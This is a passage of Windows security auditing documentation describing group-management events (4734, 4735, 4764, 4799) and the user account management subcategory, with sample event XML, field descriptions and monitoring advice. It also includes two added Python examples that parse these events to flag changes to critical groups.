Windows 10
Windows Server 2016
Subcategory: Audit Security Group Management
Event Description:
This event generates every time a security-enabled (security) local group is deleted.
This event generates on domain controllers, member servers, and workstations.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4734</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13826</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-08-19T18:23:42.426245700Z" />
    <EventRecordID>175039</EventRecordID>
    <Correlation />
    <Execution ProcessID="520" ThreadID="1072" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="TargetUserName">AccountOperators</Data>
    <Data Name="TargetDomainName">CONTOSO</Data>
    <Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6605</Data>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x35e38</Data>
    <Data Name="PrivilegeList">-</Data>
  </EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the “delete group” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “delete group”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Group:
Security ID [Type = SID]: SID of the deleted group. Event Viewer automatically tries to resolve SIDs and show the group name. If the SID cannot be resolved, you will see the source data in the event.
Group Name [Type = UnicodeString]: the name of the group that was deleted. For example: ServiceDesk
Group Domain [Type = UnicodeString]: domain or computer name of the deleted group. Formats vary,
and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For a local group, this field will contain the name of the computer to which this group belongs, for example: “Win81”.
Built-in groups: Builtin
Additional Information:
Privileges [Type = UnicodeString]: the list of user privileges which were used during the operation, for example, SeBackupPrivilege. This parameter might not be captured in the event, and in that case appears as “-”. See the full list of user privileges in “Table 8. User Privileges.”

Security Monitoring Recommendations

For 4734(S): A security-enabled local group was deleted.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have a list of critical local or domain security groups in the organization, and need to specifically monitor these groups for any change, especially group deletion, monitor events with the “Group\Group Name” values that correspond to the critical local or domain security groups. Examples of critical local or domain groups are the built-in local Administrators group, Domain Admins, Enterprise Admins, and so on.
If you need to monitor each time a local or domain security group is deleted, to see who deleted it and when, monitor this event. Typically, this event is used as an informational event, to be reviewed if needed.
4735(S): A security-enabled local group was changed.
4/5/2019 • 6 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Security Group Management
Event Description:
This event generates every time a security-enabled (security) local group is changed.
This event generates on domain controllers, member servers, and workstations.
Some changes do not invoke a 4735 event, for example, changes made on the Managed By tab of the group account properties in the Active Directory Users and Computers management console.
If you change the name of the group (SAM Account Name), you also get “4781: The name of an account was changed” if “Audit User Account Management” subcategory success auditing is enabled.
If you change the group type, you get a change event from the new group type’s auditing subcategory instead of 4735. If you need to monitor for group type changes, it is better to monitor for “4764: A group’s type was changed.” These events are generated for any group type when the group type is changed. “Audit Security Group Management” subcategory success auditing must be enabled.
From the 4735 event you can get information about changes to the sAMAccountName and sIDHistory attributes; for any other change you will see that something changed, but you will not be able to see what exactly changed.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4735</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13826</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-08-19T02:00:45.537440000Z" />
    <EventRecordID>174850</EventRecordID>
    <Correlation />
    <Execution ProcessID="512" ThreadID="1092" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="TargetUserName">AccountOperators_NEW</Data>
    <Data Name="TargetDomainName">CONTOSO</Data>
    <Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6605</Data>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x3031e</Data>
    <Data Name="PrivilegeList">-</Data>
    <Data Name="SamAccountName">AccountOperators_NEW</Data>
    <Data Name="SidHistory">-</Data>
  </EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the “change group” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “change group”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Group:
Security ID [Type = SID]: SID of the changed group. Event Viewer automatically tries to resolve SIDs and show the group name. If the SID cannot be resolved, you will see the source data in the event.

Note Sometimes you can see that the Group\Security ID field contains an old group name in Event Viewer (as you can see in the event example). That happens because Event Viewer caches names for SIDs that it has already resolved for the current session.
Note The Security ID field has the same value as the new group name (Changed Attributes\SAM Account Name). That happens because the event is generated after the name was changed, and the SID resolves to the new name. It is always better to use the SID instead of group names for queries or filtering of events, because then you know for sure that this is the right object you are looking for or want to monitor.

Group Name [Type = UnicodeString]: the name of the group that was changed. For example: ServiceDesk
Group Domain [Type = UnicodeString]: domain or computer name of the changed group. Formats vary,
and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For a local group, this field will contain the name of the computer to which this group belongs, for example: “Win81”.
Built-in groups: Builtin
Changed Attributes:

Note If an attribute was not changed, it will have the “-” value.

You might see a 4735 event without any changes inside, that is, where all Changed Attributes appear as “-”. This usually happens when a change is made to an attribute that is not listed in the event. In this case there is no way to determine which attribute was changed. For example, this would happen if you change the Description of a group object using the Active Directory Users and Computers administrative console. Also, if the discretionary access control list (DACL) is changed, a 4735 event will generate, but all attributes will be “-”.
SAM Account Name [Type = UnicodeString]: the new name of the changed group, used to support clients and servers from previous versions of Windows (pre-Windows 2000 logon name). If the value of the sAMAccountName attribute of the group object was changed, you will see the new value here. For example: ServiceDesk. For local groups it is simply the new name of the group, if it was changed.
SID History [Type = UnicodeString]: contains previous SIDs used for the object if the object was moved from another domain. Whenever an object is moved from one domain to another, a new SID is created and becomes the objectSID. The previous SID is added to the sIDHistory property. If the value of the sIDHistory attribute of the group object was changed, you will see the new value here. For local groups it is not applicable and always has the “-” value.
Additional Information:
Privileges [Type = UnicodeString]: the list of user privileges which were used during the operation, for example, SeBackupPrivilege. This parameter might not be captured in the event, and in that case appears as “-”. See the full list of user privileges in “Table 8. User Privileges.”

Security Monitoring Recommendations

For 4735(S): A security-enabled local group was changed.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have a list of critical local or domain security groups in the organization, and need to specifically monitor these groups for any change, monitor events with the “Group\Group Name” values that correspond to the critical local or domain security groups.
If you need to monitor each time a member is added to a local or domain security group, to see who added the member and when, monitor this event. Typically, this event is used as an informational event, to be reviewed if needed.
If your organization has naming conventions for account names, monitor “Attributes\SAM Account Name” for names that don’t comply with the naming conventions.
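An added example (not from the documentation) of how a monitor can act on the 4735 semantics described above: it keeps its own SID-keyed record of group names so that a rename can report the old name the event does not carry, flags sIDHistory changes and naming-convention violations, and treats a 4735 whose Changed Attributes are all “-” as explained only when a 4732 or 4733 for the same group and logon session follows it within a short window. The five-second window, the letters-only naming rule and the event sequence are constructed assumptions.

```python
import re
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
DOMAIN_SID = "S-1-5-21-3457937927-2839227994-823803824"   # domain SID used in the page's samples
NAMING_RULE = re.compile(r"^[A-Za-z]+$")                  # constructed naming convention: letters only
CORRELATION_WINDOW = timedelta(seconds=5)                 # assumption: a 4735 precedes its 4732/4733 by seconds


def parse_event(xml_text):
    """Return (event_id, time_created, data) from the Event XML layout shown on the page."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    event_id = int(system.find("e:EventID", NS).text)
    stamp = system.find("e:TimeCreated", NS).get("SystemTime")
    when = datetime.strptime(stamp[:19], "%Y-%m-%dT%H:%M:%S")   # drop sub-second digits and the "Z"
    data = {d.get("Name"): (d.text or "") for d in root.find("e:EventData", NS)}
    return event_id, when, data


class GroupChangeMonitor:
    """Interprets 4735: renames, sIDHistory changes, and changes the event cannot show."""
    def __init__(self):
        self.names = {}      # group SID -> last name seen; the event itself only carries the new name
        self.pending = []    # 4735 events with every Changed Attribute "-", awaiting a 4732/4733
        self.alerts = []

    def feed(self, xml_text):
        event_id, when, d = parse_event(xml_text)
        sid, subject, logon = d["TargetSid"], d["SubjectUserName"], d["SubjectLogonId"]
        if event_id == 4735:
            new_name, sid_history = d.get("SamAccountName", "-"), d.get("SidHistory", "-")
            old_name = self.names.get(sid)
            if new_name != "-":
                # The SID already resolves to the new name, so the old name must come from our own record.
                if old_name != new_name:
                    self.alerts.append(f"rename: {sid} {old_name or '<unknown>'} -> {new_name} by {subject}")
                if not NAMING_RULE.match(new_name):
                    self.alerts.append(f"naming-violation: {new_name}")
                self.names[sid] = new_name
            else:
                self.names.setdefault(sid, d["TargetUserName"])
            if sid_history != "-":
                self.alerts.append(f"sid-history-changed: {sid} now {sid_history} by {subject}")
            if new_name == "-" and sid_history == "-":
                self.pending.append({"sid": sid, "logon": logon, "when": when, "subject": subject})
        elif event_id in (4732, 4733):
            self.names.setdefault(sid, d["TargetUserName"])
            # A membership change explains the empty 4735 logged just before it for the same group
            # and logon session, so that 4735 needs no alert of its own.
            self.pending = [p for p in self.pending if not (
                p["sid"] == sid and p["logon"] == logon and when - p["when"] <= CORRELATION_WINDOW)]
        self._expire(when)
        return list(self.alerts)

    def _expire(self, now):
        kept = []
        for p in self.pending:
            if now - p["when"] > CORRELATION_WINDOW:
                self.alerts.append(f"opaque-change: {p['sid']} ({self.names.get(p['sid'], '?')}) by "
                                   f"{p['subject']} at {p['when']}; attribute not carried in 4735")
            else:
                kept.append(p)
        self.pending = kept

    def flush(self):
        """End of batch: every empty 4735 that no 4732/4733 explained becomes an alert."""
        self._expire(datetime.max)
        return list(self.alerts)


def group_event(event_id, time_created, extra, name="AccountOperators"):
    """Constructed event for group RID 6605 changed by dadmin in logon session 0x3031e."""
    fields = {"TargetUserName": name, "TargetDomainName": "CONTOSO", "TargetSid": f"{DOMAIN_SID}-6605",
              "SubjectUserSid": f"{DOMAIN_SID}-1104", "SubjectUserName": "dadmin",
              "SubjectDomainName": "CONTOSO", "SubjectLogonId": "0x3031e", "PrivilegeList": "-", **extra}
    body = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f'<TimeCreated SystemTime="{time_created}" /></System><EventData>{body}</EventData></Event>')


NEW = "AccountOperators_NEW"
# Constructed sequence: an empty 4735 explained by a 4732 one second later, then a rename,
# then an empty 4735 that nothing explains (for example a description or DACL change).
SEQUENCE = [
    group_event(4735, "2015-08-19T02:00:45.537440000Z", {"SamAccountName": "-", "SidHistory": "-"}),
    group_event(4732, "2015-08-19T02:00:46.000000000Z", {"MemberSid": f"{DOMAIN_SID}-500"}),
    group_event(4735, "2015-08-19T02:05:00.000000000Z", {"SamAccountName": NEW, "SidHistory": "-"}, name=NEW),
    group_event(4735, "2015-08-19T02:10:00.000000000Z", {"SamAccountName": "-", "SidHistory": "-"}, name=NEW),
]


def run(sequence):
    monitor = GroupChangeMonitor()
    for event in sequence:
        monitor.feed(event)
    return monitor.flush()
```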
4764(S): A group’s type was changed.
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Security Group Management
Event Description:
This event generates every time a group’s type is changed.
This event generates for both security and distribution groups.
This event generates only on domain controllers.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4764</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13826</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-08-20T00:25:33.459568000Z" />
    <EventRecordID>175221</EventRecordID>
    <Correlation />
    <Execution ProcessID="516" ThreadID="1072" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="GroupTypeChange">Security Enabled Local Group Changed to Security Disabled Local Group.</Data>
    <Data Name="TargetUserName">CompanyAuditors</Data>
    <Data Name="TargetDomainName">CONTOSO</Data>
    <Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6608</Data>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x38200</Data>
    <Data Name="PrivilegeList">-</Data>
  </EventData>
</Event>

Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the “change group type” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note: A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that
user from the database and places it in the access token for that user. The system uses the SID in the access
token to identify the user in all subsequent interactions with Windows security. When a SID has been used as
the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For
more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “change group type”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Change Type [Type = UnicodeString]: contains three parts: “<Param1> Changed To <Param2>.” The two
parameters can have the following values (they cannot have the same value at the same time):
Security Disabled Local Group
Security Disabled Universal Group
Security Disabled Global Group
Security Enabled Local Group
Security Enabled Universal Group
Security Enabled Global Group
Group:
Security ID [Type = SID]: SID of the changed group. Event Viewer automatically tries to resolve SIDs and
show the group name. If the SID cannot be resolved, you will see the source data in the event.
Group Name [Type = UnicodeString]: the name of the group whose type was changed. For example:
ServiceDesk
Group Domain [Type = UnicodeString]: domain or computer name of the changed group. Formats vary,
and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For a local group, this field will contain the name of the computer to which this group belongs,
for example: “Win81”.
Built-in groups: Builtin
Additional Information:
Privileges [Type = UnicodeString]: the list of user privileges which were used during the operation, for
example, SeBackupPrivilege. This parameter might not be captured in the event, and in that case appears as “-”.
See the full list of user privileges in “Table 8. User Privileges”.

Security Monitoring Recommendations

For 4764(S): A group’s type was changed.

Important: For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have a list of critical local or domain groups in the organization, and need to specifically monitor
these groups for any change, especially group type change, monitor events with the “Group\Group
Name” values that correspond to the critical distribution groups. Examples of critical local or domain
groups are built-in local administrators group, domain admins, enterprise admins, critical distribution
groups, and so on.
If you need to monitor each time any group’s type is changed, to see who changed it and when, monitor
this event. Typically, this event is used as an informational event, to be reviewed if needed.
4799(S): A security-enabled local group membership was enumerated.
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Security Group Management
Event Description:
This event generates when a process enumerates the members of a security-enabled local group on the
computer or device.
This event doesn't generate when group members were enumerated using the Active Directory Users and
Computers snap-in.

Note: For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4799</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13826</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-11-12T03:50:23.625407600Z" />
    <EventRecordID>685</EventRecordID>
    <Correlation ActivityID="{CBAEDE08-1CF0-0000-50DE-AECBF01CD101}" />
    <Execution ProcessID="744" ThreadID="188" />
    <Channel>Security</Channel>
    <Computer>WIN10-1.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="TargetUserName">Administrators</Data>
    <Data Name="TargetDomainName">Builtin</Data>
    <Data Name="TargetSid">S-1-5-32-544</Data>
    <Data Name="SubjectUserSid">S-1-5-21-1377283216-344919071-3415362939-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x72d9d</Data>
    <Data Name="CallerProcessId">0xc80</Data>
    <Data Name="CallerProcessName">C:\Windows\System32\mmc.exe</Data>
  </EventData>
</Event>

Required Server Roles: none.
Minimum OS Version: Windows Server 2016, Windows 10.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the “enumerate security-enabled local group
members” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID
cannot be resolved, you will see the source data in the event.

Note: A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “enumerate security-enabled
local group members” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Group:
Security ID [Type = SID]: SID of the group whose members were enumerated. Event Viewer automatically
tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data
in the event.
Group Name [Type = UnicodeString]: the name of the group whose members were enumerated.
Group Domain [Type = UnicodeString]: group’s domain or computer name. Formats vary, and
include the following:
For Builtin groups this field has the “Builtin” value.
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For a local group, this field will contain the name of the computer to which this group belongs, for
example: “Win81”.
Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that enumerated the members of the
group. Process ID (PID) is a number used by the operating system to uniquely identify an active process. To
see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column).
If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process has
been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.

Security Monitoring Recommendations

For 4799(S): A security-enabled local group membership was enumerated.

Important: For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have a list of critical local security groups in the organization, and need to specifically monitor these
groups for any access (in this case, enumeration of group membership), monitor events with the
“Group\Group Name” values that correspond to the critical local security groups. Examples of critical local
groups are built-in local administrators, built-in backup operators, and so on.
If you need to monitor each time the membership is enumerated for a local or domain security group, to see
who enumerated the membership and when, monitor this event. Typically, this event is used as an
informational event, to be reviewed if needed.
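The triage that both the 4764 and the 4799 recommendations describe (match the Group fields of exported Security events against a list of critical groups and surface who changed or enumerated the group), as an added example that is not part of the Microsoft documentation. The critical-group list is an assumption a deployment would tailor, and the sample records are constructed from the event XML shown on this page with the System element trimmed.

```python
"""Triage of Security Group Management events (4735, 4764, 4799) against a list of
critical groups, as the Security Monitoring Recommendations describe.  Added example;
the critical-group list is an assumption and the sample records are constructed
from the XML shown on this page."""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Match by SID where one is well known (group names can be renamed or localized)
# and by domain\name otherwise.  Constructed list; a deployment tailors it.
CRITICAL_GROUP_SIDS = {
    "S-1-5-32-544",  # BUILTIN\Administrators
    "S-1-5-32-551",  # BUILTIN\Backup Operators
}
CRITICAL_GROUP_NAMES = {("CONTOSO", "CompanyAuditors")}


def parse_event(xml_text):
    """Return (EventID, {Data Name: value}) for one Security event record."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find("e:System/e:EventID", NS).text)
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return event_id, data


def triage(xml_text):
    """Return a list of findings for one event; empty when the group is not critical."""
    event_id, d = parse_event(xml_text)
    group = (d.get("TargetDomainName", ""), d.get("TargetUserName", ""))
    if d.get("TargetSid", "") not in CRITICAL_GROUP_SIDS and group not in CRITICAL_GROUP_NAMES:
        return []
    subject = f"{d.get('SubjectDomainName', '')}\\{d.get('SubjectUserName', '')}"
    name = "\\".join(group)
    findings = []
    if event_id == 4764:
        # Change Type has the form "<Param1> Changed To <Param2>."; a security-enabled
        # group that becomes security-disabled can no longer carry permissions.
        change = d.get("GroupTypeChange", "")
        findings.append(f"4764: type of critical group {name} changed by {subject}: {change}")
        before, _, after = change.lower().partition("changed to")
        if "security enabled" in before and "security disabled" in after:
            findings.append("4764: security-enabled group downgraded to a distribution group")
    elif event_id == 4799:
        proc = d.get("CallerProcessName", "")
        findings.append(f"4799: membership of critical group {name} enumerated by {subject} via {proc}")
    elif event_id == 4735:
        findings.append(f"4735: critical local group {name} changed by {subject}")
    return findings


# Constructed from the 4764 sample on this page (System element trimmed).
SAMPLE_4764 = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4764</EventID><Computer>DC01.contoso.local</Computer></System>
  <EventData>
    <Data Name="GroupTypeChange">Security Enabled Local Group Changed to Security Disabled Local Group.</Data>
    <Data Name="TargetUserName">CompanyAuditors</Data>
    <Data Name="TargetDomainName">CONTOSO</Data>
    <Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6608</Data>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x38200</Data>
    <Data Name="PrivilegeList">-</Data>
  </EventData>
</Event>"""

# Constructed from the 4799 sample on this page (System element trimmed).
SAMPLE_4799 = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4799</EventID><Computer>WIN10-1.contoso.local</Computer></System>
  <EventData>
    <Data Name="TargetUserName">Administrators</Data>
    <Data Name="TargetDomainName">Builtin</Data>
    <Data Name="TargetSid">S-1-5-32-544</Data>
    <Data Name="SubjectUserSid">S-1-5-21-1377283216-344919071-3415362939-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x72d9d</Data>
    <Data Name="CallerProcessId">0xc80</Data>
    <Data Name="CallerProcessName">C:\Windows\System32\mmc.exe</Data>
  </EventData>
</Event>"""

if __name__ == "__main__":
    for sample in (SAMPLE_4764, SAMPLE_4799):
        for finding in triage(sample):
            print(finding)
```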
Audit User Account Management
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit User Account Management determines whether the operating system generates audit events when
specific user account management tasks are performed.
Event volume: Low.
This policy setting allows you to audit changes to user accounts. Events include the following:
A user account is created, changed, deleted, renamed, disabled, enabled, locked out or unlocked.
A user account’s password is set or changed.
A security identifier (SID) is added to the SID History of a user account, or fails to be added.
The Directory Services Restore Mode password is configured.
Permissions on administrative user accounts are changed.
A user's local group membership is enumerated.
Credential Manager credentials are backed up or restored.
Some events in this subcategory, for example 4722, 4725, 4724, and 4781, are also generated for computer
accounts.

| Computer Type | General Success | General Failure | Stronger Success | Stronger Failure | Comments |
|---|---|---|---|---|---|
| Domain Controller | Yes | Yes | Yes | Yes | This subcategory contains many useful events for monitoring, especially for critical domain accounts, such as domain admins, service accounts, database admins, and so on. We recommend Failure auditing, mostly to see invalid password change and reset attempts for domain accounts, DSRM account password change failures, and failed SID History add attempts. |
| Member Server | Yes | Yes | Yes | Yes | We recommend monitoring all changes related to local user accounts, especially built-in local Administrator and other critical accounts. We recommend Failure auditing, mostly to see invalid password change and reset attempts for local accounts. |
| Workstation | Yes | Yes | Yes | Yes | We recommend monitoring all changes related to local user accounts, especially built-in local Administrator and other critical accounts. We recommend Failure auditing, mostly to see invalid password change and reset attempts for local accounts. |
Events List:
4720(S): A user account was created.
4722(S): A user account was enabled.
4723(S, F): An attempt was made to change an account's password.
4724(S, F): An attempt was made to reset an account's password.
4725(S): A user account was disabled.
4726(S): A user account was deleted.
4738(S): A user account was changed.
4740(S): A user account was locked out.
4765(S): SID History was added to an account.
4766(F): An attempt to add SID History to an account failed.
4767(S): A user account was unlocked.
4780(S): The ACL was set on accounts which are members of administrators groups.
4781(S): The name of an account was changed.
4794(S, F): An attempt was made to set the Directory Services Restore Mode administrator password.
4798(S): A user's local group membership was enumerated.
5376(S): Credential Manager credentials were backed up.
5377(S): Credential Manager credentials were restored from a backup.
4720(S): A user account was created.
4/5/2019 • 17 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit User Account Management
Event Description:
This event generates every time a new user object is created.
This event generates on domain controllers, member servers, and workstations.

Note: For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4720</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13824</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-08-20T16:22:02.759912000Z" />
    <EventRecordID>175408</EventRecordID>
    <Correlation />
    <Execution ProcessID="520" ThreadID="1508" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="TargetUserName">ksmith</Data>
    <Data Name="TargetDomainName">CONTOSO</Data>
    <Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6609</Data>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
